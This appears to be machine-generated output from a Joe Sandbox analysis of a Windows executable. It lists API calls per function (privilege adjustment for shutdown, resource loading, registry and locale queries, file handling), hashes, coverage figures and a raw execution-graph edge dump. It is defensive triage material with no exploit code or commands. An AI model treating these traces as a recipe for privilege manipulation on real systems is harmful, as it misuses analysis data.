                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: SystemTime
                                                                              • String ID:
                                                                              • API String ID: 2656138-0
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,00409C6A), ref: 00405D02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                              • API String ID: 4190037839-2401316094
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                              • LocalFree.KERNEL32(0051A368,00000000,00401AB4), ref: 00401A1B
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,0051A368,00000000,00401AB4), ref: 00401A3A
                                                                              • LocalFree.KERNEL32(0051B368,?,00000000,00008000,0051A368,00000000,00401AB4), ref: 00401A79
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                              • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID:
                                                                              • API String ID: 3782394904-0
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000$9@
                                                                              • API String ID: 1220098344-1503883590
                                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                              • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                              • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CommandHandleLineModule
                                                                              • String ID: U1hd.@$`&P
                                                                              • API String ID: 2123368496-819386106
                                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID: )q@
                                                                              • API String ID: 3660427363-2284170586
                                                                              • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                              • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                              • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                              • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                              APIs
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                              • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                              Execution Graph

                                                                              Execution Coverage: 16%
                                                                              Dynamic/Decrypted Code Coverage: 0%
                                                                              Signature Coverage: 4.7%
                                                                              Total number of Nodes: 2000
                                                                              Total number of Limit Nodes: 76
50800->50803 50806 47ae96 50801->50806 50807 47aec4 50801->50807 50805 403494 4 API calls 50802->50805 50804 403494 4 API calls 50803->50804 50804->50844 50805->50844 50808 47aeb2 50806->50808 50809 47ae9f 50806->50809 50812 47aed2 50807->50812 50813 47af01 50807->50813 50811 47bd90 57 API calls 50808->50811 50810 403494 4 API calls 50809->50810 50810->50844 50811->50844 50814 47aeee 50812->50814 50815 47aedb 50812->50815 50818 47af22 50813->50818 50819 47af0f 50813->50819 50817 403494 4 API calls 50814->50817 50816 403494 4 API calls 50815->50816 50816->50844 50817->50844 50821 47af43 50818->50821 50822 47af30 50818->50822 50820 403494 4 API calls 50819->50820 50820->50844 50844->50756 50991->50737 50993 403804 50992->50993 50995 40382f 50992->50995 50994 4038a4 18 API calls 50993->50994 50994->50995 50995->50737 50996->50737 51001->50751 51002->50761 51003->50759 51004->50779 51080->50724 51082 47d809 51081->51082 51085 47d846 51081->51085 51113 455d0c 51082->51113 51085->50015 51087 47d85d 51087->50015 51232 466588 51088->51232 51091->50025 51093 42f56c 51092->51093 51094 42f58f GetActiveWindow GetFocus 51093->51094 51095 41eea4 2 API calls 51094->51095 51096 42f5a6 51095->51096 51097 42f5c3 51096->51097 51098 42f5b3 RegisterClassA 51096->51098 51099 42f652 SetFocus 51097->51099 51100 42f5d1 CreateWindowExA 51097->51100 51098->51097 51101 403400 4 API calls 51099->51101 51100->51099 51102 42f604 51100->51102 51103 42f66e 51101->51103 51263 42427c 51102->51263 51108 494aac 32 API calls 51103->51108 51105 42f62c 51106 42f634 CreateWindowExA 51105->51106 51106->51099 51107 42f64a ShowWindow 51106->51107 51107->51099 51108->50062 51269 44b514 51109->51269 51114 455d1d 51113->51114 51115 455d21 51114->51115 51116 455d2a 51114->51116 51139 455a10 51115->51139 51147 455af0 43 API calls 51116->51147 51119 455d27 51119->51085 51120 47d460 51119->51120 51126 47d55c 51120->51126 51129 47d4a0 51120->51129 51121 47d4ff 51122 403420 4 API calls 51121->51122 51123 47d63f 
51122->51123 51123->51087 51126->51121 51131 47d5ad 51126->51131 51202 479150 51126->51202 51128 47bd90 57 API calls 51128->51131 51129->51121 51129->51126 51130 47bd90 57 API calls 51129->51130 51137 47d508 51129->51137 51176 479290 51129->51176 51187 4793f4 51129->51187 51130->51129 51131->51126 51131->51128 51133 454100 34 API calls 51131->51133 51135 47d549 51131->51135 51132 47bd90 57 API calls 51132->51137 51133->51131 51135->51121 51137->51129 51137->51132 51137->51135 51191 42c92c 51137->51191 51196 42c954 51137->51196 51201 47d16c 66 API calls 51137->51201 51148 42de1c 51139->51148 51141 455a2d 51142 455a7b 51141->51142 51151 455944 51141->51151 51142->51119 51145 455944 20 API calls 51146 455a5c RegCloseKey 51145->51146 51146->51119 51147->51119 51149 42de27 51148->51149 51150 42de2d RegOpenKeyExA 51148->51150 51149->51150 51150->51141 51156 42dd58 51151->51156 51153 403420 4 API calls 51154 4559f6 51153->51154 51154->51145 51155 45596c 51155->51153 51159 42dc00 51156->51159 51160 42dc26 RegQueryValueExA 51159->51160 51165 42dc49 51160->51165 51175 42dc6b 51160->51175 51161 403400 4 API calls 51163 42dd37 51161->51163 51162 42dc63 51164 403400 4 API calls 51162->51164 51163->51155 51164->51175 51165->51162 51166 4034e0 18 API calls 51165->51166 51167 403744 18 API calls 51165->51167 51165->51175 51166->51165 51168 42dca0 RegQueryValueExA 51167->51168 51168->51160 51170 42dcbc 51168->51170 51169 4038a4 18 API calls 51171 42dcfe 51169->51171 51170->51169 51170->51175 51172 42dd10 51171->51172 51174 403744 18 API calls 51171->51174 51173 403450 18 API calls 51172->51173 51173->51175 51174->51172 51175->51161 51177 4792a6 51176->51177 51178 4792a2 51176->51178 51179 403450 18 API calls 51177->51179 51178->51129 51180 4792b3 51179->51180 51181 4792d3 51180->51181 51182 4792b9 51180->51182 51183 479150 33 API calls 51181->51183 51184 479150 33 API calls 51182->51184 51185 4792cf 51183->51185 51184->51185 51186 403400 4 API calls 51185->51186 51186->51178 51188 
479400 51187->51188 51189 47941b 51188->51189 51214 453344 18 API calls 51188->51214 51189->51129 51215 42c79c 51191->51215 51194 403778 18 API calls 51195 42c94e 51194->51195 51195->51137 51197 42c79c IsDBCSLeadByte 51196->51197 51198 42c964 51197->51198 51199 403778 18 API calls 51198->51199 51200 42c975 51199->51200 51200->51137 51201->51137 51203 47916b 51202->51203 51204 47922a 51203->51204 51207 47919c 51203->51207 51227 479004 33 API calls 51203->51227 51204->51126 51206 4791c1 51210 4791e2 51206->51210 51229 479004 33 API calls 51206->51229 51207->51206 51228 479004 33 API calls 51207->51228 51210->51204 51211 479222 51210->51211 51230 453344 18 API calls 51210->51230 51221 478e88 51211->51221 51214->51189 51216 42c67c IsDBCSLeadByte 51215->51216 51217 42c7b1 51216->51217 51218 42c7fb 51217->51218 51220 42c444 IsDBCSLeadByte 51217->51220 51218->51194 51220->51217 51222 478ec3 51221->51222 51223 403450 18 API calls 51222->51223 51224 478ee8 51223->51224 51231 477578 33 API calls 51224->51231 51226 478f29 51226->51204 51227->51207 51228->51206 51229->51210 51230->51211 51231->51226 51233 403494 4 API calls 51232->51233 51234 4665b6 51233->51234 51249 42dbc8 51234->51249 51237 42dbc8 19 API calls 51238 4665da 51237->51238 51239 466474 33 API calls 51238->51239 51240 4665e4 51239->51240 51241 42dbc8 19 API calls 51240->51241 51242 4665f3 51241->51242 51252 4664ec 51242->51252 51245 42dbc8 19 API calls 51246 46660c 51245->51246 51247 403400 4 API calls 51246->51247 51248 466621 51247->51248 51248->50019 51256 42db10 51249->51256 51253 46650c 51252->51253 51254 4078f4 33 API calls 51253->51254 51255 466556 51254->51255 51255->51245 51257 42db30 51256->51257 51258 42dbbb 51256->51258 51257->51258 51259 4037b8 18 API calls 51257->51259 51261 403800 18 API calls 51257->51261 51262 42c444 IsDBCSLeadByte 51257->51262 51258->51237 51259->51257 51261->51257 51262->51257 51264 4242ae 51263->51264 51265 42428e GetWindowTextA 51263->51265 51267 403494 4 API calls 
51264->51267 51266 4034e0 18 API calls 51265->51266 51268 4242ac 51266->51268 51267->51268 51268->51105 51272 44b38c 51269->51272 51273 44b3bf 51272->51273 51274 414ae8 18 API calls 51273->51274 51275 44b3d2 51274->51275 51276 44b3ff GetDC 51275->51276 51277 40357c 18 API calls 51275->51277 51283 41a1e8 51276->51283 51277->51276 51280 44b430 51291 44b0c0 51280->51291 51284 41a2af 51283->51284 51285 41a213 51283->51285 51286 403400 4 API calls 51284->51286 51302 403520 51285->51302 51287 41a2c7 SelectObject 51286->51287 51287->51280 51289 41a26b 51290 41a2a3 CreateFontIndirectA 51289->51290 51290->51284 51292 44b0d7 51291->51292 51293 44b16a 51292->51293 51294 44b0ea 51292->51294 51295 44b153 51292->51295 51294->51293 51303 4034e0 18 API calls 51302->51303 51304 40352a 51303->51304 51304->51289 51307 46514b 51305->51307 51306 465226 51316 466f00 51306->51316 51307->51306 51311 46519b 51307->51311 51328 421a1c 51307->51328 51308 4651de 51308->51306 51334 4185b8 21 API calls 51308->51334 51311->51308 51312 4651d5 51311->51312 51313 4651e0 51311->51313 51314 421a1c 21 API calls 51312->51314 51315 421a1c 21 API calls 51313->51315 51314->51308 51315->51308 51317 466f30 51316->51317 51318 466f11 51316->51318 51317->50086 51319 414b18 18 API calls 51318->51319 51320 466f1f 51319->51320 51321 414b18 18 API calls 51320->51321 51321->51317 51331 421a74 51328->51331 51333 421a2a 51328->51333 51331->51311 51332 421a59 51332->51331 51343 421d28 SetFocus GetFocus 51332->51343 51333->51332 51335 408cbc 51333->51335 51334->51306 51336 408cc8 51335->51336 51344 406dec LoadStringA 51336->51344 51339 403450 18 API calls 51340 408cf9 51339->51340 51341 403400 4 API calls 51340->51341 51342 408d0e 51341->51342 51342->51332 51343->51331 51345 4034e0 18 API calls 51344->51345 51346 406e19 51345->51346 51346->51339 51391 46c619 51390->51391 51392 46c666 51391->51392 51393 414ae8 18 API calls 51391->51393 51395 403420 4 API calls 51392->51395 51394 46c62f 51393->51394 51597 466798 20 API 
calls 51394->51597 51397 46c710 51395->51397 51397->50166 51589 408be0 19 API calls 51397->51589 51398 46c637 51399 414b18 18 API calls 51398->51399 51400 46c645 51399->51400 51401 46c652 51400->51401 51403 46c66b 51400->51403 51598 47eab4 56 API calls 51401->51598 51404 46c683 51403->51404 51405 46687c CharNextA 51403->51405 51599 47eab4 56 API calls 51404->51599 51407 46c67f 51405->51407 51407->51404 51408 46c699 51407->51408 51409 46c6b5 51408->51409 51410 46c69f 51408->51410 51411 42c99c CharNextA 51409->51411 51600 47eab4 56 API calls 51410->51600 51413 46c6c2 51411->51413 51413->51392 51601 466908 18 API calls 51413->51601 51415 46c6d9 51416 451458 18 API calls 51415->51416 51417 46c6e6 51416->51417 51602 47eab4 56 API calls 51417->51602 51420 4241ed SetActiveWindow 51419->51420 51425 424223 51419->51425 51603 42364c 51420->51603 51424 42420a 51424->51425 51426 42421d SetFocus 51424->51426 51425->50178 51425->50179 51426->51425 51428 481fe9 51427->51428 51429 481fbb 51427->51429 51431 4759c0 51428->51431 51616 49485c 32 API calls 51429->51616 51617 457b60 51431->51617 51435 475a16 51641 46e17c 51435->51641 51590->50174 51597->51398 51598->51392 51599->51392 51600->51392 51601->51415 51602->51392 51612 4235f8 SystemParametersInfoA 51603->51612 51605 423665 ShowWindow 51608 423670 51605->51608 51609 423677 51605->51609 51615 423628 SystemParametersInfoA 51608->51615 51611 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 51609->51611 51611->51424 51613 423616 51612->51613 51613->51605 51614 423628 SystemParametersInfoA 51613->51614 51614->51605 51615->51609 51616->51428 51618 457c94 51617->51618 51619 457b8c 51617->51619 51620 457ce5 51618->51620 52093 4573c8 20 API calls 51618->52093 52089 45785c GetSystemTimeAsFileTime FileTimeToSystemTime 51619->52089 51623 403400 4 API calls 51620->51623 51625 457cfa 51623->51625 51624 457b94 51626 4078f4 33 API calls 51624->51626 51638 4072a8 51625->51638 51627 457c05 51626->51627 52090 457b50 34 API calls 
